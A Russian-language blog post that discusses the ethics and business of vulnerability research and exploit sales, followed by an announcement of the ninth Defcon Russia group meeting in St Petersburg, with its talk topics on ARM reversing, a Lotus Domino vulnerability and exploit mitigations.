Что-то мне подсказывает, что вай-хатов не существуют вообще. Вернее они существуют отдельно в головах отдельных ресерчеров. У них есть свои моральные-нормы. Что можно и что нельзя. Когда мы говорим о бизнесе - эти нормы стираются в угоду общему благу корпорации 8) Если ресерчер может работать в компании сохранив свои принципы - это гуд. Но есть и грань. Например. если с Вупен все ясно - они специализируются на продаже эксплойтов гос. учреждениям, правительственным и силовым структурам - то это не плохо. Не русским же кибер-преступникам толкают! Не террористам! Не китайским шпионам. В их понятиях морали - это нормально. Они вейт-хэты. Не вижу проблем, почему так делать нельзя (им). В России то же полно ресерчеров. И есть те, кто так же толкает 0day эксплойты - http://intevydis.com/vulndisco.shtml .

Есть и много других талантливых и умных парней, тот же Сергей Глазунов, а еще куча анонимных и не очень контрибуторов ZDI/iDefense. Кому и что они продают - вариантов масса, и все определяется только их собственной моралью. Поэтому не совсем понятно и даже немного обидно это обзывательство от Сергея - "Жидохэкер" 8)) Дело не в деньгах же. А еще - поиск уязвимости, написание эксплойта, поиска уязвимости в песочнице, написание второго эксплойта - это большая и не самая простая работа. А за работу надо платить. Причем плата может быть разная:
- Деньги от покупателя (гос. конторы - хорошие ребята и деньги имеют)
- Прямые деньги от вендора
- Скататься на конференцию (это тоже палата. ведь организаторы конфы платят тебе за перелет, за проживание, а BlackHat еще и дополнительный гонорар платят - как раз вот жду 8)
- Бесплатно уведомить вендора и бесплатно потом вывесить адвайзои, спустя год, на своем сайте.

(отсортировано в порядке прибыльности, а так же в порядке ценности уязвимостей.)

Все это выгода. Даже последний пункт - сырая выгода. К примеру, есть у нас фирма, оказывающая консалтинговые услуги по ИБ. Кроме того мы может ещё и что-то там продаем. Но нам нужен ПР, что бы быть самыми-самыми! Для этого создаются лаборатории и там вывешиваются адвайзори - смотрите, мы нашли столько опасных проблем - мы умные и добрые, связывайтесь с нами, покупайте...! У большинства европейских контор, занимающихся пен-тестами есть такие вот лабы. Это нормально. Это показатель. Поэтому на вопрос к PTSec - "Зачем вы это делаете?! Хотите сделать мир лучше?" от кого-то из разработчиков. Ответ очевиден - ПР. Это же рынок, такие тут законы. И DSecRG - то же ПР. Конечно нас прет от этого, мы любим искать баги, нам приятно получать благодарности от IBM, VMware, SAP и тд. Но у нас есть компания, которая зарабатывает деньги консалтингом, и что бы было очевидно, кто умеет работать, а кто просто словами бросается, нужны такие лабы:

http://www.ioactive.com/resources_advisories.html
и много еще кто...

Ну и Россия:

И это все? Если есть ещё - пишите, добавлю!

Так что не надо говорить про белых шляп, когда речь идет о бизнесе 8)
Дело в людях... например, вот есть проблема с группой сайтов и, допустим, утечкой данных через что-то там. Что делает белая шляпа? Создает панику? Создает инфо-повод - привлекая внимание СМИ? Или тихо помогает сайтам-пострадавшим? Но ведь в последнем случае НИКТО не узнает о тимуровцах...






Defcon Group #7812 - девятая встреча

В эту пятницу, в Питере, в Политехе пройдет 9-ая встреча нашей группы. Надеемся, будет угарно и весело (как обычно)! Никаких перс. данных, никаких стандартов и комплаенса.

Темы:

  • Алексей Россовский — «Основы реверсинга ARM». В докладе будут рассмотрены основы ARM архитектуры, принципы реверсинга низкоуровневых приложений.
  • Алексей Синцов — «Проникновение в Lotus Domino через сервис консоли администрирования». Доклад с конференции BlackHat EU, о трудностях боевых будней рядового пен-теcтера, а так же о 0day уязвимости в Lotus Domino Server Controller. Будет рассказано о проблемах качественного проведения тестов на проникновения, а также на живом примере будут продемонстрированы уязвимости консоли администратора Lotus Domino (Domino Controller, порт 2050/tcp). Почему 0day уязвимость, продемонстрированная на конференциях ZeroNights и BlackHat EU до сих пор не закрыта? Можно ли с её помощью взломать IBM? Правительство США?
  • Дмитрий Евдокимов, Алесандр Миноженко, Алексей Синцов — «Binary Armor/Windows world». Описание существующих методов и технологий защиты ПО от угроз произвольного выполнения кода. DEP, ASLR, /GS, Песочницы и многое другое, что полезно знать разработчику.
  • «Offensive Security — WTF?». Дискуссионная панель для всех страждущих общения и обмена опытом. Тема дня — offensive security, разработка эксплойтов, тесты на проникновение — где граница между злом, добром, честностью и бизнесом?

Желающие выступить — пишите на defconrussia@gmail.com.

Место:
СПбГПУ (Политех) — Корпус 11 (ФУИТ). Аудитория 102 ул. Обручевых, д. 1 (вход с ул. Гидротехников). Карта.

Подробности — https://defcon-russia.ru/9.php.

Вход свободный.

Twitter — https://twitter.com/defconrussia.